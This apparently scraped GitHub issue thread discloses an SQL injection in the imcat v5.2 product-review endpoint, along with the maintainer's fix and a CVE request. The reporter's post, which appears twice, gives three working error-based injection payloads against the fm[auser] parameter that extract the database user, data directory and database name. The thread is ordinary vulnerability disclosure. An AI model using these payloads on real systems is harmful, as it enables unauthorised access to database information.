Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Hi, I would like to report Sql injection vulnerability in latest release(v5.2) product reviews(/root/plus/coms/add_coms.php)
I found it in the demo(https://imcat.txjia.com/chn.php?crem&pid=2015-9h-n441)
Add a product reviews
Test the fm[auser] in request body
payload: 'and/**/extractvalue('anything',concat('~',(select user())))and'
'and/**/extractvalue('anything',concat('~',(select user())))and'
payload: 'and/**/extractvalue('anything',concat('~',(select @@datadir)))and'
'and/**/extractvalue('anything',concat('~',(select @@datadir)))and'
payload 'and/**/extractvalue('anything',concat('~',(select database())))and'
'and/**/extractvalue('anything',concat('~',(select database())))and'
The text was updated successfully, but these errors were encountered:
Thanks!
I checked this error message, It done ok for insert review, It is the bug when deel with accumulate points for the member. By the way, did your logined as a member?
I fixed this in the site: https://imcat.txjia.com/, Can it stop you from attacking?
Hope your massage, I'll update master branch after your checked it.
Sorry, something went wrong.
Great.I just rechecked the SQL injection on the demo and it has been fixed.
By the way, I didn't logined when I found the vulnerability.
OK, Thanks!
Hi,can you help me requests a CVE? Requesting a CVE identification number-GitHub Docs Thinks.
No branches or pull requests
Hi, I would like to report Sql injection vulnerability in latest release(v5.2) product reviews(/root/plus/coms/add_coms.php)
I found it in the demo(https://imcat.txjia.com/chn.php?crem&pid=2015-9h-n441)
Add a product reviews

Test the fm[auser] in request body
payload:

'and/**/extractvalue('anything',concat('~',(select user())))and'payload:

'and/**/extractvalue('anything',concat('~',(select @@datadir)))and'payload

'and/**/extractvalue('anything',concat('~',(select database())))and'The text was updated successfully, but these errors were encountered: